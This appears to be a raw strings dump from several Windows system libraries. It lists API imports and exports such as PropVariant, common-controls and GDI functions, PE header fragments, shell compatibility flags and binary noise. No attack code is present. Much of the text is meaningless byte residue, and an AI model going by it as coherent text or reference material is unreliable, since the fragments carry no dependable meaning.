RtlNtStatusToDosError NtOpenEvent RtlInitializeCriticalSection NtRequestWaitReplyPort NtConnectPort RtlInitUnicodeString RegCloseKey RegOpenKeyExW RegSetValueExW RegCreateKeyExW OpenProcessToken GetCurrentProcess GetCurrentThread OpenThreadToken TerminateProcess GetCurrentThreadId GetCurrentProcessId TlsAlloc TlsSetValue TlsGetValue TlsFree CreateThread ImpersonateLoggedOnUser RevertToSelf GetTokenInformation FreeLibraryAndExitThread GetModuleHandleExW VirtualFree GetSystemInfo lstrcmpW CompareStringW QueryPerformanceFrequency QueryPerformanceCounter LockResource LoadResource GetFullPathNameW GetSystemDirectoryW UnmapViewOfFile CreateSemaphoreW DuplicateHandle MapViewOfFile GetACP IsDebuggerPresent InterlockedExchange CreateFileMappingW FindClose FindNextFileW FindFirstFileW DelayLoadFailureHook LoadLibraryExA Sleep GetSystemTimeAsFileTime UnhandledExceptionFilter SetUnhandledExceptionFilter SetFilePointer GetSystemTime SystemTimeToFileTime FormatMessageW ReadFile FindResourceW SizeofResource GetStringTypeW MultiByteToWideChar DeleteAtom AddAtomW GetFileAttributesW ExpandEnvironmentStringsW RegDeleteValueW RegQueryValueExW RegOpenCurrentUser GetModuleHandleW LoadLibraryExW HeapFree HeapReAlloc HeapAlloc HeapDestroy HeapCreate GetUserDefaultUILanguage GetProcessHeap EnterCriticalSection LeaveCriticalSection CloseHandle InitializeCriticalSectionAndSpinCount DeleteCriticalSection WideCharToMultiByte GetLastError WriteFile lstrlenW InterlockedIncrement InterlockedDecrement InterlockedCompareExchange GetTickCount SetLastError lstrcmpiW InitializeCriticalSection FreeLibrary ReleaseActCtx DeactivateActCtx LoadLibraryW ActivateActCtx CreateActCtxW GetProcAddress DisableThreadLibraryCalls MulDiv CreateFileW GetModuleFileNameW GetAtomNameW GetFileSize VirtualAlloc GetFileTime RegGetValueW SetMenuItemInfoW GetParent GetWindowTextW InternalGetWindowText GetSysColorBrush GetClientRect IsWindowRedirectedForPrint GetMonitorInfoW MonitorFromWindow IsZoomed GetForegroundWindow IsIconic InvalidateRect CalcMenuBar LoadIconW GetCapture ReleaseCapture MsgWaitForMultipleObjectsEx PeekMessageW SetCapture DrawEdge IsWindowVisible DrawIconEx MonitorFromRect DrawMenuBar GetMenuItemCount GetMenuBarInfo PaintMenuBar ValidateRect GetKeyState GetMessagePos LoadStringW ClientToScreen IsServerSideWindow DestroyWindow SetWindowTextW CreateWindowExW RegisterClassW LoadCursorW GetClassInfoW SystemParametersInfoW SystemParametersInfoA AdjustWindowRectEx GetShellWindow FindWindowW AllowSetForegroundWindow UnhookWindowsHookEx SetWindowsHookExW CallNextHookEx IsMenu GetMenuInfo SetThreadDesktop OpenInputDesktop GetThreadDesktop DefFrameProcW DestroyIcon GetSysColor IsWindowInDestroy SetWindowRgn GetWindowRgnBox GetIconInfo CreateIconIndirect GetTitleBarInfo GetSystemMenu GetMenuItemInfoW SendMessageW GetAncestor GetClassLongW SetWindowPos IsThreadDesktopComposited TrackMouseEvent GetWindowLongW SetWindowLongW CallWindowProcW DefWindowProcW GetDCEx GetDesktopWindow PostMessageW GetWindowThreadProcessId SetProcessDPIAware SetSysColors GetDC RemovePropW SetPropW GetPropW GetClassNameW OpenDesktopW EnumDesktopWindows CloseDesktop GetWindow EnumChildWindows InflateRect DrawTextW CopyImage DrawTextExW GetWindowDC ReleaseDC GetGUIThreadInfo GetProcessWindowStation GetUserObjectInformationW GetSystemMetrics CopyRect PtInRect WindowFromDC SetTimer RedrawWindow KillTimer EqualRect OffsetRect GetWindowRect MapWindowPoints IsRectEmpty IntersectRect FillRect SetRect IsWindow IsChild GetWindowInfo CharNextW SendMessageTimeoutW EnumDisplaySettingsW EnumDisplayDevicesW EnumDesktopsW SetRectEmpty SetBkMode SetTextColor GdiDrawStream SetLayout GdiGradientFill PtInRegion CreateFontIndirectW SetStretchBltMode StretchBlt GetRegionData GdiFlush SetViewportOrgEx SetWindowOrgEx CreateCompatibleDC CreateCompatibleBitmap GetObjectW SetBoundsRect GetBoundsRect GdiTransparentBlt GetRgnBox GetViewportOrgEx GetWindowOrgEx GetCurrentObject SetBitmapAttributes ClearBitmapAttributes SetTextAlign GetTextAlign GetDIBits CreatePatternBrush SetBrushOrgEx GetClipBox RectVisible SetDIBits ExtCreateRegion CombineRgn AbortPath StrokeAndFillPath ExtCreatePen GetDeviceCaps PatBlt CreateDIBSection GdiAlphaBlend CreateRectRgnIndirect DeleteDC GetLayout GetRandomRgn LPtoDP OffsetRgn ExcludeClipRect GetObjectType PathToRegion SetBkColor ExtTextOutW GetBkColor IntersectClipRect CreatePen CreateSolidBrush GetStockObject Rectangle RoundRect BeginPath Ellipse EndPath SelectClipPath BitBlt SelectClipRgn CreateRectRgn GetClipRgn SelectObject CreateDIBitmap DeleteObject GetTextMetricsW RSDS5 UxTheme.pdb "eKt1 #XHt :_Ht xHt-wHt .Jt2 +Jt1 ZeHt 3{Ht nxHt Windows Shell true !This program cannot be run in DOS mode. RichTZ .text `.orpc `.data .rsrc @.reloc msvcrt.dll ntdll.dll KERNEL32.dll ole32.dll OLEAUT32.dll USER32.dll RPCRT4.dll pw/Fqw -qwe swNVrw rwtNrw qw'Wqw qwOppw qwtXswG qwn) 2qw5 Brwf TrwJSrw" qwEWqwT Jqw!~w M}w{M}w b}w#u |w^!~w PROPSYS.dll ClearPropVariantArray ClearVariantArray DllCanUnloadNow DllGetClassObject DllRegisterServer DllUnregisterServer GetProxyDllInfo InitPropVariantFromBooleanVector InitPropVariantFromBuffer InitPropVariantFromCLSID InitPropVariantFromDoubleVector InitPropVariantFromFileTime InitPropVariantFromFileTimeVector InitPropVariantFromGUIDAsString InitPropVariantFromInt16Vector InitPropVariantFromInt32Vector InitPropVariantFromInt64Vector InitPropVariantFromPropVariantVectorElem InitPropVariantFromResource InitPropVariantFromStrRet InitPropVariantFromStringAsVector InitPropVariantFromStringVector InitPropVariantFromUInt16Vector InitPropVariantFromUInt32Vector InitPropVariantFromUInt64Vector InitPropVariantVectorFromPropVariant InitVariantFromBooleanArray InitVariantFromBuffer InitVariantFromDoubleArray InitVariantFromFileTime InitVariantFromFileTimeArray InitVariantFromGUIDAsString InitVariantFromInt16Array InitVariantFromInt32Array InitVariantFromInt64Array InitVariantFromResource InitVariantFromStrRet InitVariantFromStringArray InitVariantFromUInt16Array InitVariantFromUInt32Array InitVariantFromUInt64Array InitVariantFromVariantArrayElem PSCoerceToCanonicalValue PSCreateAdapterFromPropertyStore PSCreateDelayedMultiplexPropertyStore PSCreateMemoryPropertyStore PSCreateMultiplexPropertyStore PSCreatePropertyChangeArray PSCreatePropertyStoreFromObject PSCreatePropertyStoreFromPropertySetStorage PSCreateSimplePropertyChange PSEnumeratePropertyDescriptions PSFormatForDisplay PSFormatForDisplayAlloc PSFormatPropertyValue PSGetImageReferenceForValue PSGetItemPropertyHandler PSGetItemPropertyHandlerWithCreateObject PSGetNameFromPropertyKey PSGetNamedPropertyFromPropertyStorage PSGetPropertyDescription PSGetPropertyDescriptionByName PSGetPropertyDescriptionListFromString PSGetPropertyFromPropertyStorage PSGetPropertyKeyFromName PSGetPropertySystem PSGetPropertyValue PSLookupPropertyHandlerCLSID PSPropertyBag_Delete PSPropertyBag_ReadBOOL PSPropertyBag_ReadBSTR PSPropertyBag_ReadDWORD PSPropertyBag_ReadGUID PSPropertyBag_ReadInt PSPropertyBag_ReadLONG PSPropertyBag_ReadPOINTL PSPropertyBag_ReadPOINTS PSPropertyBag_ReadPropertyKey PSPropertyBag_ReadRECTL PSPropertyBag_ReadSHORT PSPropertyBag_ReadStr PSPropertyBag_ReadStrAlloc PSPropertyBag_ReadStream PSPropertyBag_ReadType PSPropertyBag_ReadULONGLONG PSPropertyBag_ReadUnknown PSPropertyBag_WriteBOOL PSPropertyBag_WriteBSTR PSPropertyBag_WriteDWORD PSPropertyBag_WriteGUID PSPropertyBag_WriteInt PSPropertyBag_WriteLONG PSPropertyBag_WritePOINTL PSPropertyBag_WritePOINTS PSPropertyBag_WritePropertyKey PSPropertyBag_WriteRECTL PSPropertyBag_WriteSHORT PSPropertyBag_WriteStr PSPropertyBag_WriteStream PSPropertyBag_WriteULONGLONG PSPropertyBag_WriteUnknown PSPropertyKeyFromString PSRefreshPropertySchema PSRegisterPropertySchema PSSetPropertyValue PSStringFromPropertyKey PSUnregisterPropertySchema PropVariantChangeType PropVariantCompareEx PropVariantGetBooleanElem PropVariantGetDoubleElem PropVariantGetElementCount PropVariantGetFileTimeElem PropVariantGetInt16Elem PropVariantGetInt32Elem PropVariantGetInt64Elem PropVariantGetStringElem PropVariantGetUInt16Elem PropVariantGetUInt32Elem PropVariantGetUInt64Elem PropVariantToBSTR PropVariantToBoolean PropVariantToBooleanVector PropVariantToBooleanVectorAlloc PropVariantToBooleanWithDefault PropVariantToBuffer PropVariantToDouble PropVariantToDoubleVector PropVariantToDoubleVectorAlloc PropVariantToDoubleWithDefault PropVariantToFileTime PropVariantToFileTimeVector PropVariantToFileTimeVectorAlloc PropVariantToGUID PropVariantToInt16 PropVariantToInt16Vector PropVariantToInt16VectorAlloc PropVariantToInt16WithDefault PropVariantToInt32 PropVariantToInt32Vector PropVariantToInt32VectorAlloc PropVariantToInt32WithDefault PropVariantToInt64 PropVariantToInt64Vector PropVariantToInt64VectorAlloc PropVariantToInt64WithDefault PropVariantToStrRet PropVariantToString PropVariantToStringAlloc PropVariantToStringVector PropVariantToStringVectorAlloc PropVariantToStringWithDefault PropVariantToUInt16 PropVariantToUInt16Vector PropVariantToUInt16VectorAlloc PropVariantToUInt16WithDefault PropVariantToUInt32 PropVariantToUInt32Vector PropVariantToUInt32VectorAlloc PropVariantToUInt32WithDefault PropVariantToUInt64 PropVariantToUInt64Vector PropVariantToUInt64VectorAlloc PropVariantToUInt64WithDefault PropVariantToVariant StgDeserializePropVariant StgSerializePropVariant VariantCompare VariantGetBooleanElem VariantGetDoubleElem VariantGetElementCount VariantGetInt16Elem VariantGetInt32Elem VariantGetInt64Elem VariantGetStringElem VariantGetUInt16Elem VariantGetUInt32Elem VariantGetUInt64Elem VariantToBoolean VariantToBooleanArray VariantToBooleanArrayAlloc VariantToBooleanWithDefault VariantToBuffer VariantToDosDateTime VariantToDouble VariantToDoubleArray VariantToDoubleArrayAlloc VariantToDoubleWithDefault VariantToFileTime VariantToGUID VariantToInt16 VariantToInt16Array VariantToInt16ArrayAlloc VariantToInt16WithDefault VariantToInt32 VariantToInt32Array VariantToInt32ArrayAlloc VariantToInt32WithDefault VariantToInt64 VariantToInt64Array VariantToInt64ArrayAlloc VariantToInt64WithDefault VariantToPropVariant VariantToStrRet VariantToString VariantToStringAlloc VariantToStringArray VariantToStringArrayAlloc VariantToStringWithDefault VariantToUInt16 VariantToUInt16Array VariantToUInt16ArrayAlloc VariantToUInt16WithDefault VariantToUInt32 VariantToUInt32Array VariantToUInt32ArrayAlloc VariantToUInt32WithDefault VariantToUInt64 VariantToUInt64Array VariantToUInt64ArrayAlloc VariantToUInt64WithDefault _^[] ALtqALt QtiILt 9LtqALt 9LtP cLtj PtqALt\ PtqALt\ [Mto MtqALtX |Qta MtqALtX MtqALtX MtqALtX MtqALtX MtqALtX PtqALt PtqALt MtqALt1 Mt\ PtqALtK Mt& PtqALtQcLt PtqALt QtqALtQcLt |Qt' QtT-Qt ILtqALt |QtM QtT-Qt QtqALtQcLt |QtQ QtT-Qt QtqALt} ILtqALt QtT-Qt %QtqALtNGLt %QtqALt |QtG&Qt %QtqALtQcLt GLtqALtNGLt 4QtT-Qt NtqALt |Qtm-QtT-Qt NtqALtQcLt -QtT-Qt NtqALtQcLt yOt| NtT-Qt GLtqALtNGLt 5QtT-Qt NtqALtQcLt8BQt 3QtH)Qt BQtT-Qt MtqALtX kQtT-Qt Ot"kQtqALtX |QtGkQt QtqALtX QtT-Qt QtqALtX |QtS QtqALtX QtT-Qt $RtqALt1 |Qt%%Rt%'RtqALt 'RtqALt |Qt9(RtT-Qt 'RtqALt )RtT-Qt OtJNRtqALt ORt>ORt1URt^URt MRtqALt XRt YRtaQRt ZRtqALt3\RtIZRt ZRt?^Rt [RtqALt \Rt)[Rt tRtqALt vRtEtRtgtRt RtqALt RtqALt IMtqALt;HMt GMtQTLt PtqALtsKMt OMtqALtQcLt NtqALt ~Nt?~Nt3 _^[] PBLt3 Lt_^ Rh0CLtP Stt" x!VV _^[] |0SVW 7_^] GLt5HLtAGLt Mtq:Qt]MLt "Qtw#Qt;#Qt }Mt) GLtS tGLt Nt5HLt !Qtl WhDILtS TILt _^[] DLt3 PhTILt )rHSV x+j Xf _[^] I8#M t W; j\_f; hLPLtWP h(PLtWP PLt3 Ph@QLt PhXQLt SW9u @^_[ Lt9^ Lt_^ jc(= Q+BJ VLt] tLWV ^L9; Stt" t69E AACCN 9_^[] _^[] QRPh tFW3 jLt!eLt, sLt5 OtXpQt jLtujLt PtFrQtUrQt Pt7rQt PtIpQt{ Pt(rQtRqQt:pQt oQt+pQt] rQt"oQt |eLt heLt XeLt HeLt gLtP VSWP SVWj 8ULt :LtW (RhH8LtP |eLt heLt XeLt HeLt PtujLt jLtS H8Lt kLt $mLt ULtW PhH8Lt Ph$mLtj h(ULt muZF _^[] IvLt vLt nLth IvLt vLt nLt rLtIvLt vLt nLtm sLtIvLt vLt nLt pLttwLtYwLt Pt jRt Pt jRt Pt jRt Pt{'Ntl'Ntx EXoLt 0nLt _^[] _^[] QhH8LtW _^[] xoLt hoLt XoLt HoLt t 9M FFJu _^[] QhtGLtP Ph8 tc@f; t f; PhH QhtGLtP ???? UUUUUUU TUUUUU+ TUUU UUUE )1$N*)Q&`[U !"# eEf=ghfijklimnf=o f=pqrst OVWX @8 W rNth( Lt8ULt LtRwQt LtfHMt }Qtu _^[] ULtVj $ULt tQSW Mt46Qt CQtP8Qt=CQt CQt^9Qt}8Qto7Qt37Qt 6QtQ7Qt BQtA8Qta6Qt 6QtR6Qt wErH; w%r(; _^[] PhtGLtj "9Qt 8QtLCQt BQt|9Qt 7QtC6Qt 7Qt.CQt 6Qt%6Qt$7Qt MtQ*Qt 9Qt} 8Qt[CQt CQtjCQt@9Qt#8Qt 6Qt_8Qt 9Qt28Qtp6Qt FQtm Nt19Qt +QtW+Qt +Qtm9Qt O9Qt 9QtB7Qt 8Qtn8Qt~7Qt 8QtyCQt 7Qt`7Qt FQtW QPVj StPPj LtHH] H>Lt `=Lt PPPP WVRPQ VN]$D{ r?%G V#"d v}z0 0_FF i3OPBK ytCF W/`|d +XUz jc(= jc(= @t:f |Kf; ?jHYf LtqALt BLteBLt{BLt QPVj jGYf; x#SW3 _[^] rW;= }tlr H8Lt X8Lt 9Lt _^[] Ff9u Ph PhtGLt ^[| _^[] 9xDt tZW3 [^_] x7;F @^_] tP9] QSV3 7_^[ VjHPhx v/!u HFG;8r LtPWV u Mt p;Lt _^[] VW9E StSV Mth4 @_^[] ?Mt(@Mt AMtk@MttDMt C?Mt St1E Y__^[ j,hp u 9u 'Pt('Pt 5'PtI'Pt i'Pt}'Pt 6(PtJ(Pt +MtD,Mt +MtD,Mt Mtl+MtD,Mt Mt(+MtD,Mt :MtX *Mt ,Mt ,Mth *Mt ,Mt ,Mtx *Mt ,Mt +Mtd*MtD,Mt MtH*Mt *Mt,,Mt MtH*Mt )Mt8,Mt MtH*Mt )Mt8,Mt MtH*Mt )Mt8,Mt Mtp)MtD,Mt %>KH #_4H \[&v`G: WaQ- XIk|N 43?Z .%2F i8pI St_^ SWh$?Mt ?MtW StSSh SttSh ?MtW >MtW >MtW n30' EventWrite EventEnabled EventUnregister EventRegister St_[ StukV St^t9Hu$ `DMt (ULt (EMt ,cLt j\V s>j\ _^[] hTILt ( MMtV f9>u hXbMtV _^[] {(Wj h:Lt 9t V t1V3 9-Wu w k hMtW @4QP Sth` 9>u# 98u' t!WWWj StW3 VhPBLt mMtj Ph@mMt mMtV mMtV sQj;V bLtV t\9u t ;} $QtV Xf;E QSV3 v7!u h$ULt HFG;8r |MPh x3j 5}*9 8vMt uyMtazMt9yMt mMtZ yMtS `yMt OtazMt StazMty NtazMt rQt%sQtAsQtasQt sQt) |QtH|Qtd|Qtf NtVj yMt3 ULtV _^[] ULtj u SW a:W[ jg%,J Mt%M l Mt SV3 WQSP N(;M F(;E RhtGLtPS ULtP Pt{'Nt$ !PtP f99u !PtP RVWWWWh$ULt $PtWP FFf9 j\Xf FFf9 WWWj tEHt/Ht Php2Pt Php2Pt Php2Pt Php2Pt fPt9 T^Pt YPtV <^Pt DYPt_ \gPt) $ePtq h_Pt $gPt0 ePt] h`Pt YPtQ ,VPtY `]Pt dPtw gPt1 wDEST wspItihc.JunodJ wspItihc.JunodJ CDEST DEST DEST DEST CONTEXTMENU CORELINTERNETENUM OLDCREATEVIEWWND WIN95DEFVIEW DOCOBJECT FLUSHNOWAITALWAYS MYCOMPUTERFIRST OLDREGITEMGDN LOADCOLUMNHANDLER ANSI STAROFFICE5PRINTER NOVALIDATEFSIDS WIN95SHLEXEC WIN95BINDTOOBJECT IGNOREENUMRESET ANSIDISPLAYNAMES FILEOPENBOGUSCTRLID FORCELFNIDLIST RETURNALLATTRIBS NODEFVIEWMSGPUMP STRIPFOLDERBIT RETURNNONURLSASURLS NOTHREADUSECHECKS FORCELIBRARYPARSE STATICJUMPLISTSIZE APPISOFFICE IGNOREDEFAULTTOKEN COINITIALIZE_COMPAREIDS WPWIN7.EXE PRWIN70.EXE PS80.EXE QPW.EXE QFINDER.EXE PFIM80.EXE UA80.EXE PDXWIN32.EXE SITEBUILDER.EXE HOTDOG4.EXE RNAAPP.EXE PDEXPLO.EXE SIZEMGR.EXE SMARTCTR.EXE 96.0 WPWIN8.EXE PRWIN8.EXE UE32.EXE 2.00.0.0 PP70.EXE PP80.EXE ABCMM.EXE CORELDRW.EXE FILLER51.EXE AUTORUN.EXE 4.10.1998 4.00.950 POWERPNT.EXE MSMONEY.EXE 7.05.1107 soffice.EXE WPWIN9.EXE PRWIN9.EXE DAD9.EXE OTNEEDSSFCACHE NO_WEBVIEW UNBINDABLE PINDLL NEEDSFILESYSANCESTOR NOTAFILESYSTEM CTXMENU_NOVERBS CTXMENU_LIMITEDQI COCREATESHELLFOLDERONLY NEEDSSTORAGEANCESTOR NOLEGACYWEBVIEW CTXMENU_XPQCMFLAGS NOIPROPERTYSTORE *j)StL)Stf0St )St[)St.)StW0St )St=)Sty)StH0St}.St "Stu0St %St 2St/-St St' St&'St _^[] tF9u tIVV 7PtPj Stu4 profapi.dll 9^8u tIWj< h4UPtW Nt XdNt(dNt pGNt@TNt P?Nt ?Nt H(Nt HmNt 8=Nt `ANt0ANt PGNt GNt X@Nt(@Nt ,kNt DNt`DNt pBNt@BNt @cNt 8lNt ,bNt fNthfNt aNtlaNt teNtDeNt CNtPCNt ENtpENt qNt,pNt rNtlpNt 0FNt rNtN}Nt jNthjNt rNt Windows Shell true CRIM WEVT TTBL@ TEMP TEMPh TEMP\ O%?I ype name="System.StructuredQueryType.AllBitsSet" base="System.StructuredQueryType.Integer"> !This program cannot be run in DOS mode. Rich .text `.data .rsrc @.reloc jqwT qwWt qw5Yqw 0qwI1qw pwA+qw qwaxpw Wqw8 qwKRpw5 pwZppw {qwgXpw\ qwOppw UrwD Yqw[GqwCGqw ]sw5 pw~nrw FqwF qwEWqw qw:Vqw Uqw'Wqw }sw} VqwN Rqwynqw pqw* qw%-qw/ qwn) 8Ox(S Rhh ctP |8Wj !stx atr!stq )st_ !stx atr!stq )st_ `t_9 `t_^[] nt{Tet Set _@^] _@^] _@^] Iiit pgit _@^] Iiit _@^] 2`bt QhH ct `tVS ;F<} `t_^ `tVW `thH tt_^ t,^] d>ctt 9F|t V|PRQ vPQRP 9F|t 'bt QSVW `t9E `tPh u;9] @_^] F Wj0_W AACCN _^[] PFVj +G(j +H(j VQPj `t;F4 t 9} G;>| | ;~ 9~pu QhX ctP3 FDHP FP+E G;>| VW9E ttSV @_^[] u 9u "mt/"mt J"mt^"mt n30' LpkEditControl tt_[ Vj0j PVh\ `th0 ttu:V btVW tef9 @@Ju N[tH @@JO _^[] Ht:HVW _^[] `tRRS srtd tt1E `t;F j$h QRPhlstt @@PV `tPS t ;p `tVPS d>ct j Y3 }Dbt bt]dot dotzz`t?Vat j`t~ eotT at6eot fot]fot htTvbt fotE gotH Eet@got Net--`t Qbt* htLhot `t- `t hot(iot ~`tNjot v`tT joti jot#kot y`tekot Zet#8ht htJ PWhB PQj) _^[] Y__^[ srtd tt1E ct! ct ct" ottFatw ct! ctQ Hdt[edt] HIMLVV 8 ct H ct X ct h ct x ct PSSj Wj X vTQP QhX ctP @^_] [^_] qPPj @^_] qPPj W< uE W< u X ct 8 ct H ct x ct h ct pt?9qt pt?9qt pt?9qt _^[] SSSS @j f tkVVVV PjTW COMCTL32.dll AddMRUStringW AttachScrollBars CCEnableScrollBar CCGetScrollInfo CCSetScrollInfo CreateMRUListW CreateMappedBitmap CreatePropertySheetPage CreatePropertySheetPageA CreatePropertySheetPageW CreateStatusWindow CreateStatusWindowA CreateStatusWindowW CreateToolbar CreateToolbarEx CreateUpDownControl DPA_Clone DPA_Create DPA_CreateEx DPA_DeleteAllPtrs DPA_DeletePtr DPA_Destroy DPA_DestroyCallback DPA_EnumCallback DPA_GetPtr DPA_GetPtrIndex DPA_GetSize DPA_Grow DPA_InsertPtr DPA_LoadStream DPA_Merge DPA_SaveStream DPA_Search DPA_SetPtr DPA_Sort DSA_Clone DSA_Create DSA_DeleteAllItems DSA_DeleteItem DSA_Destroy DSA_DestroyCallback DSA_EnumCallback DSA_GetItem DSA_GetItemPtr DSA_GetSize DSA_InsertItem DSA_SetItem DSA_Sort DefSubclassProc DestroyPropertySheetPage DetachScrollBars DllGetVersion DllInstall DrawInsert DrawScrollBar DrawShadowText DrawSizeBox DrawStatusText DrawStatusTextA DrawStatusTextW EnumMRUListW FlatSB_EnableScrollBar FlatSB_GetScrollInfo FlatSB_GetScrollPos FlatSB_GetScrollProp FlatSB_GetScrollRange FlatSB_SetScrollInfo FlatSB_SetScrollPos FlatSB_SetScrollProp FlatSB_SetScrollRange FlatSB_ShowScrollBar FreeMRUList GetEffectiveClientRect GetMUILanguage GetWindowSubclass HIMAGELIST_QueryInterface HandleScrollCmd ImageList_Add ImageList_AddIcon ImageList_AddMasked ImageList_BeginDrag ImageList_CoCreateInstance ImageList_Copy ImageList_Create ImageList_Destroy ImageList_DestroyShared ImageList_DragEnter ImageList_DragLeave ImageList_DragMove ImageList_DragShowNolock ImageList_Draw ImageList_DrawEx ImageList_DrawIndirect ImageList_Duplicate ImageList_EndDrag ImageList_GetBkColor ImageList_GetDragImage ImageList_GetFlags ImageList_GetIcon ImageList_GetIconSize ImageList_GetImageCount ImageList_GetImageInfo ImageList_GetImageRect ImageList_LoadImage ImageList_LoadImageA ImageList_LoadImageW ImageList_Merge ImageList_Read ImageList_ReadEx ImageList_Remove ImageList_Replace ImageList_ReplaceIcon ImageList_Resize ImageList_SetBkColor ImageList_SetDragCursorImage ImageList_SetFilter ImageList_SetFlags ImageList_SetIconSize ImageList_SetImageCount ImageList_SetOverlayImage ImageList_Write ImageList_WriteEx InitCommonControls InitCommonControlsEx InitMUILanguage InitializeFlatSB LBItemFromPt LoadIconMetric LoadIconWithScaleDown MakeDragList MenuHelp PropertySheet PropertySheetA PropertySheetW QuerySystemGestureStatus RegisterClassNameW RemoveWindowSubclass ScrollBar_Menu ScrollBar_MouseMove SetWindowSubclass ShowHideMenuCtl SizeBoxHwnd Str_SetPtrW TaskDialog TaskDialogIndirect UninitializeFlatSB _TrackMouseEvent SHUNIMPL.#105 SHUNIMPL.#106 SHUNIMPL.#107 SHUNIMPL.#108 SHUNIMPL.#104 SHUNIMPL.#78 SHUNIMPL.#79 SHUNIMPL.#80 SHUNIMPL.#81 SHUNIMPL.#82 SHUNIMPL.#83 SHUNIMPL.#84 SHUNIMPL.#85 SHUNIMPL.#86 SHUNIMPL.#87 SHUNIMPL.#88 SHUNIMPL.#89 SHUNIMPL.#90 SHUNIMPL.#91 SHUNIMPL.#92 SHUNIMPL.#93 SHUNIMPL.#94 SHUNIMPL.#95 SHUNIMPL.#96 SHUNIMPL.#97 SHUNIMPL.#98 SHUNIMPL.#99 SHUNIMPL.#100 SHUNIMPL.#101 SHUNIMPL.#102 SHUNIMPL.#103 ptuNct; etuNctuNct ituNct `tEZbt otmEatuNct nbtEZbt ZbtB jtmEatuNctonbt nt$Cdt> mtuNct jrtijrt jrtN_qt itomrtj it%nrtknrt nrt)krt)krtx_qt ort(ortEkrtakrtsVqt itTpqt jtuNct KgtQ[ftUSft ctuNct gtufgt} st fgt- rtQ[ftUSft ctuNct gtufgt} st# btuNctJOct 2nt12nt jrtijrt itomrtj itXLdtknrt krt- nrt QstFQstmQst Rst`Rst Rst7 eHQW% B !` g0u 3B|rHLZ' ` n[6 Y#W- ;gk**l aC], 3w3'y jzT? [k&n^ ePFI sX_G Ocj, 7!hG 4auA Dy~O PBr: [?+\ UMtq tt#5ttlDtt tta5tt Ett| 5ttgZttx Vttt Attp ttY6ttw9ttl 6tt9Vtth Sttd Ott` ttQ7tt Ltt\ 7ttNIttX 7tt2HttT 8ttZ 4ttX%tt %ttX%tt %ttX%ttl&ttX%tt?4ttX%tte4ttX%tt %ttX%tt &ttX%tt 4ttX%tt 4ttX%ttF&ttX%tt 4ttX%tt 4ttX%tt _[^] SetGadgetRect InvalidateGadget SetGadgetStyle SetGadgetFocusEx CreateGadget DUserFlushDeferredMessages DUserFlushMessages InitGadgets UtilDrawBlendRect DisableContainerHwnd LookupGadgetTicket SetGadgetRootInfo GetStdColorBrushI GetStdColorI FindStdColor GetDUserModule ForwardGadgetMessage GetGadgetRgn DetachWndProc AttachWndProcW MapGadgetPoints GetGadgetTicket SetGadgetBufferInfo FindGadgetFromPoint KERNEL32.dll USER32.dll SHLWAPI.dll GDI32.dll API-MS-Win-Security-Base-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll ntdll.dll msvcrt.dll _wcsicmp memset _vsnwprintf memcpy _itow_s _ftol2_sse _CIsqrt wcscspn free _isnan iswalnum _vsnprintf _wcsnicmp _onexit _lock __dllonexit _unlock _except_handler4_common _amsg_exit _initterm _XcptFilter memmove _ftol2 wcschr malloc wcstol _wcsdup qsort iswalpha EtwGetTraceEnableFlags EtwGetTraceEnableLevel EtwGetTraceLoggerHandle EtwRegisterTraceGuidsW EtwUnregisterTraceGuids EtwLogTraceEvent EtwEventUnregister EtwEventRegister NtQueryInformationProcess EtwEventWrite EtwEventEnabled RtlRunDecodeUnicodeString RtlRunEncodeUnicodeString RtlRandomEx RegCloseKey RegQueryValueExW RegCreateKeyExW RegGetValueW RegOpenKeyExW RegOpenCurrentUser RegSetValueExW GetCurrentProcessId OpenProcessToken ProcessIdToSessionId TerminateProcess GetCurrentProcess GetCurrentThreadId CheckTokenMembership FreeSid AllocateAndInitializeSid GdiGetCharDimensions FrameRgn CreateRoundRectRgn CreatePolygonRgn SetBoundsRect GetBoundsRect CreateFontW SetLayoutWidth GetTextFaceW PlayEnhMetaFile GetBkMode GetTextCharset GetTextCharsetInfo QueryFontAssocStatus GetCharABCWidthsW CreateRectRgnIndirect GetClipRgn GetCharWidthInfo GetDIBits SetDIBits SetRectRgn OffsetRgn SetViewportOrgEx ExtTextOutW LPtoDP DeleteEnhMetaFile GetBrushOrgEx ExtCreateRegion GetRegionData CreateDIBPatternBrushPt GetRgnBox GdiTransparentBlt CreateCompatibleDC GetTextMetricsW SelectObject DeleteObject PatBlt CreateSolidBrush GetNearestColor SetBkMode SetBkColor SetTextColor SetTextAlign GetTextAlign RestoreDC IntersectClipRect SaveDC RectVisible GetObjectW SelectClipRgn ExcludeClipRect CombineRgn CreateRectRgn DeleteDC CreateBitmap CreateCompatibleBitmap SetLayout CreateEllipticRgn Ellipse BitBlt GetStockObject CreatePen GetCharWidthW TextOutW GetClipBox GetDeviceCaps GetTextExtentPointW LineTo MoveToEx CreateFontIndirectW CreatePatternBrush GetTextColor GetBkColor StretchDIBits CreateDIBSection SetWindowOrgEx OffsetWindowOrgEx Polyline CreateDCW GdiGradientFill GetTextExtentPoint32W TranslateCharsetInfo CreateHalftonePalette CreatePalette GetDIBColorTable RealizePalette SelectPalette UnrealizeObject StretchBlt SetBrushOrgEx GetDCOrgEx EnumFontFamiliesExW CreateBitmapIndirect GetLayout GetPaletteEntries SetPixelV SetPixel GetPixel SetDIBColorTable SetStretchBltMode GetBitmapBits GdiAlphaBlend MaskBlt GetCurrentObject Rectangle StrDupW StrCmpW PathStripPathW SHGetValueW CreateCaret DestroyCaret OffsetRect CharUpperA FrameRect DrawTextExW IntersectRect CopyRect IsRectEmpty GetAsyncKeyState GetWindowInfo InvertRect GetWindowDC GetDoubleClickTime GetMessagePos LoadMenuW CallMsgFilterW GetMessageW GetDCEx DestroyMenu TrackPopupMenuEx SystemParametersInfoW GetMessageExtraInfo GetMessageTime ScrollWindowEx SetRectEmpty EnumDisplayDevicesW DeferWindowPos GetKeyboardLayout AdjustWindowRectEx DrawTextW CreateDialogIndirectParamA LoadImageW SendDlgItemMessageW IsChild SetLastErrorEx GetNextDlgTabItem EndDeferWindowPos BeginDeferWindowPos MapDialogRect SetDlgItemTextW IsDialogMessageW SetForegroundWindow CopyImage GetMonitorInfoW MonitorFromWindow SetWindowTextA SetActiveWindow GetActiveWindow PostQuitMessage GetDesktopWindow EqualRect GetUpdateRect PostMessageW MonitorFromPoint EnumChildWindows EnumDisplayMonitors ShowWindowAsync UpdateLayeredWindow CopyIcon CharNextW IsCharAlphaNumericW CharPrevW CharUpperW GetWindowPlacement EndDialog 